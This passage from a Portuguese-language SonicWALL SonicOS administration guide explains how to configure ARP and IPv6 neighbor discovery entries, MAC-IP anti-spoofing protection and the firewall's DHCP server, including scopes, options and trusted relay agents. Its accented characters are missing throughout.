ARP. Clique em Liberar cache de ARP para limpar as informaes.
Para configurar um determinado perodo de tempo para a expirao da entrada, digite um valor
em minutos no campo Tempo limite da entrada de cache de ARP (minutos).

Captulo 22
Configurando o Protocolo de Descoberta
do Vizinho
Rede > Descoberta do vizinho (Somente IPv6)

O Protocolo de Descoberta do Vizinho (NDP) um novo protocolo de mensagens que foi criado
como parte do IPv6 para executar uma srie de tarefas que o ICMP e o ARP executam no IPv4.
Assim como o ARP, a Descoberta do Vizinho cria um cache de entradas dinmicas, e o
administrador pode configurar entradas de Descoberta do Vizinho estticas. A tabela a seguir
mostra as mensagens de vizinho no IPv6 e as funes que so anlogas s mensagens de
vizinho tradicionais no IPv4.
Mensagem de vizinho no IPv4 Mensagem de vizinho no IPv6

Mensagem de solicitao no ARP Mensagem de solicitao do vizinho
Mensagem de rel no ARP Mensagem de anncio do vizinho
Cache de ARP Cache vizinho
ARP gratuito Deteco de endereo duplicado
Mensagem de solicitao de roteador Solicitao de roteador (obrigatria)
(opcional)
Mensagem de anncio de roteador Anncio de roteador (obrigatrio)
(opcional)
Mensagem de redirecionamento Mensagem de redirecionamento
O recurso NDP esttico permite que sejam criados mapeamentos estticos entre um endereo
IPv6 de camada 3 e um endereo MAC de camada 2.
Configurando o Protocolo de Descoberta do Vizinho | 347

Para configurar uma entrada de NDP esttico:
Etapa 1 Acesse a pgina Rede > Descoberta do vizinho.
Etapa 2 Na pgina Rede > Descoberta do vizinho, clique no boto Adicionar.
Etapa 3 No campo Endereo IP, digite o endereo IPv6 para o dispositivo remoto.
Etapa 4 No menu suspenso Interface, selecione a interface no firewall que ser usada para a entrada.
Etapa 5 No campo Endereo MAC, insira o endereo MAC do dispositivo remoto.
Etapa 6 Clique em OK. A entrada NDP esttica adicionada.
A tabela Cache NDP exibe todos os vizinhos IPv6 atuais. So exibidos os seguintes tipos de
vizinhos:
ACESSVEL O vizinho conhecido por ter sido acessvel em 30 segundos.
OBSOLETO O vizinho no mais conhecido por ser acessvel e o trfego foi enviado para
o vizinho em 1.200 segundos.
ESTTICO O vizinho foi configurado manualmente como um vizinho esttico.

Captulo 23
Configurar antifalsificao de MAC-IP
Rede > Antifalsificao de MAC-IP

Esta seo descreve como planejar, projetar e implementar proteo de antifalsificao de
MAC-IP no SonicOS da SonicWALL. Esta seo contm as seguintes subsees:
Viso geral da proteo de antifalsificao de MAC-IP na pgina 349
Configurar a proteo de antifalsificao de MAC-IP na pgina 350
Viso geral da proteo de antifalsificao de MAC-IP

Os ataques baseados em endereos IP e MAC so cada vez mais comuns no ambiente de
segurana de rede dos dias de hoje. Esses tipos de ataques muitas vezes tm como objetivo
uma rede local (LAN) e podem ter origem no exterior ou interior de uma rede. Na verdade, em
qualquer lugar as LANs internas esto um pouco expostas, como em salas de conferncia de
escritrios, escolas ou bibliotecas, e podem fornecer uma abertura para esses tipos de
ataques. Esses ataques tambm tm vrios nomes: ataques a intermedirios, envenenamento
de ARP, SPITS. O recurso Antifalsificao de MAC-IP reduz o risco desses ataques
fornecendo aos administradores maneiras diferentes para controlar o acesso a uma rede e
eliminando ataques de falsificao na camada 2/3 de OSI.
A eficcia do recurso Antifalsificao de MAC-IP concentra-se em duas reas. A primeira o
controle de admisso que permite aos administradores selecionar que dispositivos obtm
acesso rede. A segunda rea a eliminao de ataques de falsificao, como ataques de
negao de servio, na camada 2. Para atingir essas metas, devem ser construdos dois
caches de informaes: o cache de Antifalsificao de MAC-IP e o cache de ARP.
O cache de Antifalsificao de MAC-IP valida pacotes recebidos e determina se eles devem
ou no ser permitidos na rede. Os endereos MAC e IP de origem de um pacote recebido so
pesquisados nesse cache. Se forem encontrados, atribuda permisso ao pacote. O cache
de Antifalsificao de MAC-IP criado por meio de um ou mais dos seguintes subsistemas:
Concesses com base em servidor DHCP (servidor DHCP da SonicWALL)
Concesses com base em retransmisso de DHCP (auxiliar de IP da SonicWALL)
Entradas ARP estticas
Entradas estticas criadas por usurio
O cache de ARP criado por meio dos seguintes subsistemas:
Configurar antifalsificao de MAC-IP | 349

Pacotes de ARP; solicitaes e respostas de ARP
Entradas ARP estticas de entradas criadas por usurio
Cache de antifalsificao de MAC-IP
O subsistema de Antifalsificao de MAC-IP obtm controle de egresso bloqueando o cache
de ARP para que os pacotes de egresso (pacotes a sair da rede) no sejam falsificados por
um dispositivo no confivel ou por pacotes de ARP indesejados. Isso impede que um firewall
realize o roteamento de um pacote para o dispositivo no pretendido, com base no
mapeamento. Isso tambm evita ataques a intermedirios, atualizando o endereo MAC de um
cliente dentro de seu cache de ARP.
Configurar a proteo de antifalsificao de MAC-IP

Configuraes de interface na pgina 350
Cache antifalsificao na pgina 352
Lista de deteco de falsificaes na pgina 353
Extenso do Auxiliar de IP na pgina 354
Configuraes de interface
Para editar configuraes de antifalsificao de MAC-IP na interface de gerenciamento de
dispositivo de segurana de rede, v para a pgina Rede > Antifalsificao de MAC-IP.

Para definir configuraes para uma determinada interface, clique no cone Configurar da
interface desejada.
A janela Configuraes agora exibida para a interface selecionada. Nessa janela, as

configuraes a seguir podem ser habilitadas ou desabilitadas clicando na caixa de seleo
correspondente. Depois de concluir as suas selees de configurao para esta interface,
clique em OK. Esto disponveis as seguintes opes:
Habilitar: Para habilitar o subsistema de antifalsificao de MAC-IP no trfego por meio
dessa interface
ARP esttica: Permite que o cache antifalsificao seja criado a partir de entradas ARP
estticas
Servidor DHCP: Permite que o cache antifalsificao seja criado a partir de concesses
DHCP ativas do servidor DHCP do firewall
Retransmisso de DHCP: Permite que o cache antifalsificao seja criado a partir de
concesses DHCP ativas, de retransmisso de DHCP, com base no Auxiliar de IP. Para
obter informaes sobre alteraes ao Auxiliar de IP, consulte Extenso do Auxiliar de IP
na pgina 354.
Bloqueio de ARP: Bloqueia entradas ARP para dispositivos listados no cache de
Antifalsificao de MAC-IP. Isso aplica controle de egresso para uma interface por meio da
configurao de Antifalsificao de MAC-IP e adiciona entradas de cache de MAC-IP como
entradas permanentes no cache de ARP. Isso controla ataques por envenenamento de
ARP, uma vez que o cache de ARP no alterado por pacotes de ARP ilegtimos.
Observao de ARP: Habilita a gerao de respostas de ARP de unicast no solicitadas
para a mquina do cliente para cada entrada de cache de MAC-IP na interface. Esse
processo ajuda a impedir ataques a intermedirios.
Impor antifalsificao: Habilita o controle de ingresso na interface, bloqueando o trfego
de dispositivos no listados no cache de Antifalsificao de MAC-IP.
Lista de deteces de falsificaes: Registra todos os dispositivos que no passaram
no cache antifalsificao e lista-os na Lista de deteces de falsificaes.

Permitir gerenciamento: Permite a passagem de todos os pacotes destinados para o
endereo IP do dispositivo, mesmo se provenientes de dispositivos no momento no
listados no cache antifalsificao.
Depois de as configuraes terem sido ajustadas, a listagem da interface ser atualizada no
painel Antifalsificao de MAC-IP. O cone de crculo verde com marca de seleo branca
indica as configuraes que foram habilitadas.
Nota As interfaces a seguir so excludas da lista de Antifalsificao de MAC-IP: Interfaces no

ethernet, interfaces de membros protegidos por porta, interfaces de par de ponte de
camada 2, interfaces de alta disponibilidade e interfaces de dados de alta disponibilidade.
Cache antifalsificao
O cache antifalsificao de MAC-IP lista todos os dispositivos atualmente listados como
"autorizados" para acessar a rede e todos os dispositivos marcados como "bloqueados"
(acesso negado) da rede. Para adicionar um dispositivo lista, clique no boto Adicionar.
Uma janela agora exibida, a qual permite a Introduo manual de endereos MAC e IP para
o dispositivo. Insira as informaes nos campos fornecidos. Voc tambm pode selecionar a
aprovao ou o bloqueio do dispositivo de roteamento. A verificao da configurao do
roteador permite todo o trfego proveniente de trs deste dispositivo. O bloqueio do dispositivo
far com que os pacotes sejam bloqueados deste dispositivo, independentemente de seu
endereo IP. Uma vez realizadas suas introdues, clique em OK para retornar ao painel
principal.
Se voc precisar editar uma entrada esttica de cache antifalsificao, marque a caixa de
seleo esquerda do endereo IP e, em seguida, clique no cone de lpis na coluna
"Configurar", na mesma linha.
possvel excluir uma ou vrias entradas estticas de cache antifalsificao. Para tal,
selecione "excluir caixa de seleo" junto de cada entrada e clique no boto "Excluir".
Para limpar as estatsticas de cache, selecione os dispositivos desejados e clique em "Limpar
estatsticas".

Se voc desejar ver as informaes mais recentes do cache disponveis, clique no boto
"Atualizar".
Nota Alguns tipos de pacotes so ignorados, mesmo que o recurso Antifalsificao de MAC-IP
esteja habilitado: 1) Pacotes no IP; 2) Pacotes DHCP com IP de origem como 0; 3) Pacotes
de um tnel de VPN; 4) Pacotes com IPs unicast invlidos como seus IPs de origem; e 5)
Pacotes de interfaces em que o status de gerenciamento no est habilitado em
configuraes antifalsificao.
Lista de deteco de falsificaes

A lista de deteces de falsificaes exibe dispositivos que falharam na aprovao da
verificao do cache antifalsificao de ingresso. As entradas nesta lista podem ser
adicionadas como uma entrada antifalsificao esttica. Para tal, clique no cone de lpis na
coluna "Adicionar" do dispositivo desejado. Ser aberta uma janela de mensagem de alerta
perguntando se voc deseja adicionar esta entrada esttica. Clique em "OK" para continuar e
em "Cancelar" para retornar Lista detectada de falsificaes.
As entradas podem ser liberadas da lista clicando no boto "Liberar". O nome de cada
dispositivo tambm pode ser resolvido usando NetBios, clicando no boto "Resolver".
Os usurios podem identificar um dispositivo especfico usando a funo "Filtro" da tabela.

Para identificar um dispositivo, os usurios devem preencher o campo disponvel,
especificando o endereo IP, a interface, o endereo MAC ou o nome do dispositivo. O campo
deve ser preenchido usando a sintaxe apropriada para operadores:
Operador Opes de sintaxe

Valor com uma digitao Ip=1.1.1.1 ou ip=1.1.1.0/24
Mac=00:01:02:03:04:05
Iface=x1
Cadeia de caracteres X1
0:01
Tst-mc
1,1.
AND Ip=1.1.1.1;iface=x1
Ip=1.1.1.0/24;iface=x1;just-string
OR Ip=1.1.1.1,2.2.2.2,3.3.3.0/24
Iface=x1,x2,x3
Negativo !ip=1.1.1.1;!just-string
!iface=x1,x2
Misto Ip=1.1.1.1,2.2.2.2;mac=00:01:02:03:04:05; just-
string;!iface=x1,x2
Extenso do Auxiliar de IP
Para suportar concesses do subsistema de retransmisso de DHCP do Auxiliar de IP, foram
realizadas as seguintes alteraes no painel do Auxiliar de IP localizado em Rede > Auxiliar
de IP:
Como parte da lgica de retransmisso de DHCP, o Auxiliar de IP aprende concesses
trocadas entre clientes e o servidor DHCP e, em seguida, salva-as na memria flash.
Essas concesses aprendidas so sincronizadas no firewall ocioso, como parte das
mensagens de sincronizao de estado do Auxiliar de IP.
As associaes de endereos MAC e IP das concesses so transferidas para o cache de
Antifalsificao de MAC-IP.

Captulo 24
Configurar o servidor DHCP
Rede > Servidor DHCP

Viso geral das opes do servidor DHCP na pgina 357
Vrios escopos DHCP por interface na pgina 357
Configurar o servidor DHCP na pgina 359
Escopos de concesso de servidor DHCP na pgina 361
Concesses de DHCP atuais na pgina 361
Configurar opes avanadas do servidor DHCP na pgina 361
Configurar o servidor DHCP para intervalos dinmicos na pgina 366
Configurar entradas de DHCP estticas na pgina 370
Configurar opes genricas do DHCP para escopos de concesso de DHCP na
pgina 373
Nmeros de opes do DHCP na pgina 374
DHCP e IPv6 na pgina 382
Configurar o servidor DHCP | 355

O dispositivo de segurana Dell SonicWALL inclui um servidor DHCP (Protocolo de
Configurao Dinmica de Hosts) para distribuir endereos IP, mscaras de sub-rede,
endereos de gateway e endereos de servidor DNS para seus clientes de rede. A pgina
Rede > Servidor DHCP inclui definies para configurar o servidor DHCP do firewall.
Voc pode usar o servidor DHCP do firewall ou usar servidores DHCP existentes em sua rede.
Se sua rede usar seus prprios servidores DHCP, verifique se a caixa de seleo Habilitar
servidor DHCP est desmarcada.
O nmero de faixas de endereos e endereos IP que o servidor DHCP do firewall pode atribuir
depende do modelo, sistema operacional e das licenas do firewall. A tabela abaixo mostra o
mximo permitido de concesses DHCP para dispositivos de segurana Dell SonicWALL.
Plataforma Concesses DHCP mximas

9000 Series 16384 concesses

Viso geral das opes do servidor DHCP
Esta seo fornece uma apresentao do recurso Opes do servidor DHCP. Esta seo
O que o recurso de opes do servidor DHCP Dell SonicWALL? na pgina 357
Como funciona o recurso de opes de servidor DHCP? na pgina 357
Padres suportados na pgina 357
O que o recurso de opes do servidor DHCP Dell SonicWALL?

O recurso de opes de servidor DHCP Dell SonicWALL oferece suporte para opes de
DHCP, tambm conhecidas como extenses do fornecedor, conforme definido primeiramente
nos RFCs 2131 e 2132. As opes de DHCP permitem aos usurios especificar parmetros
adicionais de DHCP na forma de informaes predefinidas especficas de fornecedor que so
armazenadas no campo de opes de uma mensagem DHCP. Quando a mensagem DHCP
enviada para clientes na rede, ela fornece configuraes especficas de fornecedor e
informaes sobre o servio. A seo Nmeros de opes do DHCP na pgina 374 fornece
uma lista de opes de DHCP atravs do nmero de opo atribudo por RFC.
Benefcios
O recurso de opes de servidor DHCP Dell SonicWALL fornece uma interface simples para
selecionar opes de DHCP pelo nmero ou nome, tornando o processo de configurao de
DHCP fcil, rpido e compatvel com os padres DHCP definidos pelo RFC.
Como funciona o recurso de opes de servidor DHCP?

O recurso de opes de servidor DHCP permite a definio de opes DHCP utilizando um
menu suspenso com base em nmeros de opes definidos pelo RFC, permitindo que os
administradores criem facilmente objetos de DHCP e grupos de objetos e configurem opes
genricas de DHCP para escopos de concesso de DHCP dinmicos e estticos. Uma vez
definida, a opo DHCP includa no campo de opes da mensagem DHCP, a qual ento
transmitida para clientes de DHCP na rede, descrevendo a configurao da rede e os servios
disponveis.
Padres suportados
O recurso de opes de servidor DHCP suporta os seguintes padres:
RFC 2131 Protocolo de configurao dinmica de hosts
RFC 2132 Opes de DHCP e extenses de fornecedor BOOTP
Vrios escopos DHCP por interface

As sees a seguir fornecem uma viso geral do recurso Vrios escopos DHCP por interface:
O que so vrios escopos DHCP por interface? na pgina 358
Benefcios de vrios escopos DHCP na pgina 358
Como funcionam os vrios escopos DHCP por interface? na pgina 358

O que so vrios escopos DHCP por interface?
Geralmente, os servidores e clientes de DHCP residem na mesma rede ou sub-rede IP, mas
por vezes os clientes de DHCP e seus servidores DHCP associados no residem na mesma
sub-rede. O recurso Vrios escopos DHCP por interface permite que um servidor DHCP
gerencie escopos diferentes para clientes abrangendo vrias sub-redes.
Benefcios de vrios escopos DHCP

Eficincia um nico servidor DHCP pode fornecer endereos IP para clientes abrangendo
vrias sub-redes.
Compatvel com DHCP sobre VPN o processamento de mensagens DHCP retransmitidas
tratado de maneira uniforme, independentemente da provenincia de um tnel VPN ou de
um agente de retransmisso de DHCP.
Vrios escopos para VPN entre locais ao usar um servidor DHCP interno, poder ser
configurada uma sub-rede remota usando intervalos de escopo que diferem da sub-rede de
LAN/DMZ. O intervalo de escopo da sub-rede remota decidido pelo "Endereo IP de
retransmisso" definido no gateway remoto.
Vrios escopos para VPN de grupo ao usar um servidor DHCP interno, poder ser
configurado um cliente SonicWALL GVC usando intervalos de escopo que diferem da sub-rede
de LAN/DMZ. O intervalo de escopo do cliente de GVC decidido pelo "Endereo IP de
retransmisso (opcional)" definido no gateway central.
Compatvel com deteco de conflitos atualmente, o servidor DHCP executa a deteco
de conflitos do lado do servidor quando esse recurso est habilitado. A vantagem de deteco
de conflitos do lado do servidor que ela detecta conflitos mesmo quando o cliente de DHCP
no executa a deteco de conflitos do lado do cliente. No entanto, se existirem muitos clientes
de DHCP na rede, a deteco de conflitos do lado do servidor pode resultar em esperas
maiores pela concluso da alocao completa do endereo IP. A deteco de conflitos e a pr-
descoberta de rede no so executadas para um endereo IP que pertence a um escopo de
sub-rede "retransmitido". O servidor DHCP somente executa uma verificao de ICMP de
deteco de conflitos para um intervalo de sub-rede anexado sua interface.
Como funcionam os vrios escopos DHCP por interface?

Normalmente, um cliente de DHCP inicia um procedimento de alocao de endereo enviando
uma mensagem de descoberta de DHCP de difuso. Uma vez que a maioria das rotas no
encaminha pacotes de difuso, este mtodo requer que servidores e clientes de DHCP
residam na mesma rede ou sub-rede IP.
Quando os clientes de DHCP e o servidor DHCP associado no esto na mesma sub-rede,
necessrio algum tipo de agente de terceiros (agente de retransmisso BOOTP, Auxiliar de IP,
etc.) para a transferncia de mensagens DHCP entre clientes e servidor. O agente de
retransmisso de DHCP preenche o campo giaddr com seu endereo IP de interface de
ingresso e, em seguida, encaminha-o para o servidor DHCP configurado. Quando o servidor
DHCP recebe a mensagem, ele examina o campo giaddr para determinar se ele tem um
escopo DHCP que possa ser usado para fornecer uma concesso de endereo IP ao cliente.

Figura 1 Vrias sub-redes compartilhando um servidor DHCP
O recurso Vrios escopos DHCP por interface fornece aprimoramentos de segurana para
proteger contra possveis vulnerabilidades inerentes permitindo acesso mais amplo ao
servidor DHCP. A pgina Configuraes avanadas de DHCP fornece segurana com uma
nova guia para Agentes confiveis, onde possvel especificar os agentes de retransmisso
de DHCP confiveis. O servidor DHCP descarta todas as mensagens retransmitidas pelos
agentes que no estejam na lista.
Figura 2 Agentes de retransmisso de DHCP confiveis
Configurar o servidor DHCP

Se voc desejar usar o servidor DHCP do dispositivo de segurana Dell SonicWALL, selecione
Habilitar servidor DHCP na pgina Rede > Servidor DHCP.
As seguintes opes do servidor DHCP podem ser configuradas:
Selecione Habilitar deteco de conflitos para ativar a deteco automtica de conflitos
de escopo DHCP em cada zona.

Compatvel com deteco de conflitos atualmente, o servidor DHCP executa a deteco
de conflitos do lado do servidor quando esse recurso est habilitado. A vantagem de deteco
de conflitos do lado do servidor que ela detecta conflitos mesmo quando o cliente de DHCP
no executa a deteco de conflitos do lado do cliente. No entanto, se existirem muitos clientes
de DHCP na rede, a deteco de conflitos do lado do servidor pode resultar em esperas
maiores pela concluso da alocao completa do endereo IP.
Selecione Habilitar pr-descoberta de rede de servidor DHCP para que o servidor
DHCP verifique se existem outras redes de servidor DHCP. As seguintes opes podem
ser modificadas para personalizar o desempenho de pr-descoberta de rede do servidor
DHCP:
Perodo de deteco de conflitos de servidor DHCP: Define a frequncia com que
o servidor DHCP verifica se existem outras redes. O padro 300 segundos.
Nmero de recursos DHCP a serem descobertos: Define o nmero de redes DHCP
que so examinadas. O padro 10.
Tempo limite para nova verificao de recurso em conflito: Define o perodo de
tempo aps o qual so novamente verificados recursos em conflito. O padro 1800
segundos.
Tempo limite para nova verificao de recurso disponvel: Define o perodo de
tempo aps o qual so novamente verificados recursos disponveis. O padro 600
segundos.
Nota A deteco de conflitos e a pr-descoberta de rede no so executadas para um endereo

IP que pertence a um escopo de sub-rede "retransmitido". O servidor DHCP somente
executa uma verificao de ICMP de deteco de conflitos para um intervalo de sub-rede
anexado sua interface.
Para configurar Objetos de opo, Grupos de opes e Agentes confiveis, clique no boto
Avanado. Para obter informaes detalhadas sobre a configurao desses recursos,
consulte Configurar opes avanadas do servidor DHCP na pgina 361.
Configurar a persistncia do servidor DHCP

A persistncia do servidor DHCP a capacidade do firewall para salvar informaes de
concesso de DHCP e fornecer ao cliente um endereo IP previsvel que no est em conflito
com outro uso na rede, mesmo depois de reinicializar um cliente.
A persistncia do servidor DHCP funciona com o armazenamento de informaes de
concesso de DHCP periodicamente na memria flash. Isso garante que os usurios tenham
endereos IP previsveis e minimiza o risco de conflitos de endereamento IP aps uma
reinicializao.
A persistncia do servidor DHCP fornece uma experincia perfeita quando um usurio
reinicializa uma estao de trabalho. As informaes de concesso de DHCP so salvas e o
usurio mantm o mesmo endereo IP da estao de trabalho. Quando um firewall
reiniciado, normalmente devido a manuteno ou uma atualizao, a persistncia do servidor
DHCP fornece os seguintes benefcios:
Exclusividade do endereo IP: As informaes de concesso so armazenadas na
memria flash para que o risco de atribuio do mesmo endereo IP para vrios usurios
seja anulado.
Facilidade de uso: Ao salvar as informaes de concesso na memria flash, as conexes
do usurio so automaticamente restauradas.

Para configurar a persistncia do servidor DHCP, marque a caixa de seleo Habilitar
persistncia do servidor DHCP. Como alternativa, voc pode modificar a frequncia com que
o servidor DHCP armazena informaes de concesso de DHCP modificando o campo
Intervalo de monitoramento da persistncia do servidor DHCP. O padro 5 minutos.
Escopos de concesso de servidor DHCP

A tabela Escopos de concesso de servidor DHCP exibe os intervalos IP de DHCP
configurados no momento. A tabela mostra:
Tipo: Dinmico ou esttico.
Escopo de concesso: A faixa de endereos IP, por exemplo, 172.16.31.2
172.16.31.254.
Interface: A interface qual a faixa est atribuda.
Detalhes: Informaes detalhadas sobre a concesso, exibidas como uma dica de
ferramenta quando voc passa o ponteiro do mouse sobre o cone Detalhes .
Habilitar: Marque a caixa na coluna Habilitar para habilitar o intervalo do DHCP.
Desmarque-a para desabilitar o intervalo.
Configurar: Clique no cone de configurao para configurar o intervalo do DHCP.
Concesses de DHCP atuais

As informaes de concesses de DHCP atuais so exibidas na tabela Concesses de DHCP
atuais. Cada entrada de vinculao exibe o Endereo IP, o Endereo Ethernet e o Tipo de
vinculao (Dinmico, BOOTP dinmico ou BOOTP esttico).
Para excluir uma vinculao, o que libera o endereo IP no servidor DHCP, clique no cone
Excluir ao lado da entrada. Por exemplo, use o cone Excluir para remover um host
quando ele tiver sido removido da rede e voc precisar reutilizar seu endereo IP.
Configurar opes avanadas do servidor DHCP

Configurando objetos de opo do DHCP na pgina 362
Configurar grupos de opes do DHCP na pgina 363
Configurar um grupo de endereos de agentes de retransmisso de DHCP confiveis na
pgina 364
Habilitar agentes de retransmisso de DHCP confiveis na pgina 365
A seo Nmeros de opes do DHCP na pgina 374 fornece uma lista de opes DHCP pelo
nmero de opo atribudo por RFC.

Configurando objetos de opo do DHCP
Para configurar objetos de opo de DHCP, execute as seguintes etapas:
Etapa 1 No painel de navegao do lado esquerdo, navegue at Rede > Servidor DHCP.
Etapa 2 Em Configuraes do servidor DHCP, clique no boto Avanado. A pgina Configuraes
avanadas de DHCP ser exibida. A guia Objetos de opo selecionada por padro.
Etapa 3 Clique no boto Adicionar opo. A pgina Adicionar objetos de opo DHCP ser exibida.

Etapa 4 Digite um nome para a opo no campo Nome de opo.
Etapa 5 Na lista suspensa Nmero de opo, selecione o nmero de opo que corresponde sua
opo de DHCP. Para obter uma lista de nomes e nmeros de opo, consulte Nmeros de
opes do DHCP na pgina 374.
Etapa 6 Opcionalmente, marque a caixa Matriz de opes para permitir a entrada de vrios valores de
opo no campo Valor de opo.
Etapa 7 O tipo de opo exibido no menu suspenso Tipo de opo. Se apenas um tipo de opo
estiver disponvel, por exemplo, para o Nmero de opo 2 (Diferena de horrio), o menu
suspenso ficar esmaecido. Se houver vrios tipos de opes disponveis, por exemplo, para
o Nmero de opo 77 (Informaes de classe de usurio), o menu suspenso ficar
funcional.
Etapa 8 Digite o valor de opo, por exemplo, um endereo IP, no campo Valor de opo. Se a opo
Matriz de opes estiver marcada, possvel inserir vrios valores separados por ponto-e-
vrgula (;).
Etapa 9 Clique em OK. O objeto ser exibido na lista de Objetos de opo.
Configurar grupos de opes do DHCP

Para configurar grupos de opes do DHCP, execute as seguintes etapas:
Etapa 1 No painel de navegao do lado esquerdo, navegue at Rede > Servidor DHCP.
Etapa 2 Em Configuraes do servidor DHCP, clique no boto Avanado. A pgina Configuraes
avanadas de DHCP ser exibida.
Etapa 3 Clique na guia Grupos de opes.
Etapa 4 Clique no boto Adicionar grupo. A pgina Adicionar grupo de opes do DHCP exibida.

Etapa 5 Insira um nome para o grupo no campo Nome.
Etapa 6 Selecione um objeto de opo na coluna esquerda e clique no boto -> para adicion-lo ao
grupo. Para selecionar vrios objetos de opo ao mesmo tempo, mantenha a tecla Ctrl
pressionada enquanto seleciona os objetos de opo.
Etapa 7 Clique em OK. O grupo exibido na lista Grupos de opes.
Configurar um grupo de endereos de agentes de retransmisso de DHCP

confiveis
Para configurar o grupo de endereos Lista padro de agentes de retransmisso
confiveis, voc deve primeiro configurar um objeto de endereo para cada agente de
retransmisso confivel e, em seguida, adicionar esses objetos de endereos aos grupos de
endereos Lista padro de agentes de retransmisso confiveis ou a um grupo de
endereos personalizado.
A configurao de objetos de endereos ou grupos de endereos executada na pgina Rede
> Objetos de endereos.
Para configurar objetos de endereos para os agentes de retransmisso confiveis e
configurar o grupo de endereos Lista padro de agentes de retransmisso confiveis ou
um grupo de endereos personalizado, execute as seguintes etapas:
Etapa 1 No painel de navegao do lado esquerdo, navegue at Rede > Objetos de endereos.
Etapa 2 Em Objetos de endereos, clique no boto Adicionar.
Etapa 3 Na janela Adicionar objeto de endereo, preencha os campos com os valores adequados para
o agente de retransmisso de DHCP e, em seguida, clique em Adicionar. Repita conforme
necessrio para adicionar mais agentes de retransmisso. Para obter mais informaes sobre
a configurao de objetos de endereos, consulte Criar e gerenciar objetos de endereos na
pgina 277.
Etapa 4 Efetue uma das seguintes aes:
Em Grupos de endereos, para adicionar o agente de retransmisso Objetos de
endereos ao grupo de endereos Lista padro de agentes de retransmisso
confiveis, clique no cone Configurar na linha correspondente.
Selecione os objetos de endereos desejados na lista esquerda e clique no boto de
seta para a direita para mov-los para a lista direita. Quando concluir, clique em OK.

Para adicionar o agente de retransmisso Objetos de endereos a um grupo de
endereos novo e personalizado, clique em Adicionar grupo em Grupos de
endereos.
Digite um nome descritivo para o grupo de endereos no campo Nome e, em seguida,
selecione os objetos de endereos desejados na lista esquerda e clique no boto de seta
para a direita para mov-los para a lista direita. Quando concluir, clique em OK.
Habilitar agentes de retransmisso de DHCP confiveis

Na pgina Configuraes avanadas de DHCP, voc pode habilitar a opo Lista de agentes
de retransmisso confiveis usando o grupo de endereos Lista padro de agentes de
retransmisso confiveis ou criar outro grupo de endereos usando os objetos de endereos
existentes.
Para habilitar a opo Lista de agentes de retransmisso confiveis e selecionar o grupo
de endereos desejado, execute as seguintes etapas:
Etapa 1 No painel de navegao do lado esquerdo, navegue at a pgina Rede > Servidor DHCP.
Etapa 2 Em Configuraes do servidor DHCP, clique no boto Avanado.
Etapa 3 Na pgina Configuraes avanadas de DHCP, clique na guia Agentes confiveis.
Etapa 4 Marque a caixa de seleo Habilitar lista de agentes de retransmisso do DHCP

confiveis. A lista suspensa Lista de agentes de retransmisso confiveis fica disponvel.
A lista suspensa inclui todos os grupos de endereos existentes, assim como a opo Criar
novo grupo de objetos de endereo.

Etapa 5 Para usar o grupo de endereos Lista padro de agentes de retransmisso confiveis ou
outro grupo de endereos existente, selecione-o na lista suspensa.
Etapa 6 Para criar um grupo de endereos personalizado para essa opo, selecione Criar novo
grupo de objetos de endereo. A janela Adicionar grupo de objetos de endereo exibida.
Execute as seguintes etapas:
a. Preencha o campo Nome com um nome descritivo para o Grupo de endereos.
b. Selecione os objetos de endereos desejados na lista esquerda e mova-os para a lista
direita clicando no boto de seta para a direita.
c. Clique em OK.
Na janela Configuraes avanadas de DHCP, o novo grupo de endereos exibido na
lista suspensa Lista de agentes de retransmisso confiveis. O novo grupo de
endereos fica disponvel na pgina Rede > Objetos de endereos e pode ser editado ou
excludo ali.
Etapa 7 Na pgina Configuraes avanadas de DHCP, clique em OK para habilitar a opo Lista de
agentes de retransmisso confiveis com o grupo de endereos selecionado.
Configurar o servidor DHCP para intervalos dinmicos

Como o SonicOS permite vrios escopos DHCP por interface, no h nenhum requisito para
que o intervalo de sub-rede esteja anexado interface ao configurar escopos DHCP.
Para configurar o servidor DHCP para intervalos de endereos IP dinmicos, siga estas
instrues:
Etapa 1 Na pgina Rede > Servidor DHCP, na parte inferior da tabela Escopos de concesso de
servidor DHCP, clique em Adicionar dinmico. A janela Configurao de intervalos
dinmicos exibida.

Configuraes gerais
Etapa 2 Na pgina Geral, verifique se a caixa de seleo Habilitar este escopo DHCP est marcada
se desejar habilitar esse intervalo.
Etapa 3 Para preencher os campos Incio do intervalo, Fim do intervalo, Gateway padro e
Mscara de sub-rede com valores padro para uma determinada interface, marque a caixa
de seleo Preenchimento prvio da interface prxima parte inferior da pgina e escolha
a interface na lista suspensa. Os endereos IP preenchidos esto na mesma sub-rede privada
da interface selecionada.
Nota Para selecionar uma interface no menu Interface, ela deve primeiro ser totalmente
configurada e deve ser do tipo de zona LAN, WLAN ou DMZ ou ser uma subinterface de
VLAN.
Etapa 4 Use as entradas de intervalo de endereos IP preenchidas nos campos Incio do intervalo e
Fim do intervalo ou digite o seu prprio intervalo de endereos IP.
Etapa 5 Digite o nmero de minutos que um endereo IP usado antes de ser emitido outro endereo
IP no campo Tempo de concesso (minutos). 1440 minutos (24 horas) o valor padro.
Etapa 6 Use o endereo de gateway preenchido ou digite o endereo IP do gateway no campo
Gateway padro.
Etapa 7 Use a mscara de sub-rede preenchida ou digite a mscara de sub-rede do gateway no campo
Mscara de sub-rede.
Etapa 8 Selecione Permitir que clientes BOOTP usem o intervalo se voc tiver clientes BOOTP em
sua rede.
BOOTP significa protocolo bootstrap, que um servio e protocolo TCP/IP que permite que
estaes de trabalho sem disco obtenham o seu endereo IP, outras informaes de
configurao de TCP/IP e seu arquivo de imagem de inicializao de um servidor BOOTP.

Configuraes de DNS/WINS
Etapa 9 Clique na guia DNS/WINS para continuar a configurar o recurso Servidor DHCP.
Etapa 10 Se voc tiver um nome de domnio para o servidor DNS, digite-o no campo Nome de domnio.
Etapa 11 Herdar configuraes de DNS dinamicamente usando configuraes de DNS da
SonicWALL preenche automaticamente DNS e WINS com as configuraes na pgina Rede
> DNS. Esta opo est selecionada por padro.
Etapa 12 Se voc no desejar usar configuraes de rede do firewall, selecione Especificar
manualmente e digite o endereo IP de seu servidor DNS no campo Servidor DNS 1. Voc
pode especificar dois servidores DNS adicionais.
Etapa 13 Se voc tiver o WINS executando na sua rede, digite o(s) endereo(s) IP do servidor WINS no
campo Servidor WINS 1. Voc pode adicionar mais um servidor WINS.

Configuraes avanadas
Etapa 14 Clique na guia Avanado. A guia Avanado permite que voc configure o servidor DHCP para
enviar informaes do Gerenciador de chamadas da Cisco para clientes de VoIP na rede.
Etapa 15 Em Gerenciadores de chamadas VoIP, insira o endereo IP ou FQDN do seu gerenciador de

chamadas VoIP no campo Gerenciador de chamadas 1. Voc pode adicionar mais dois
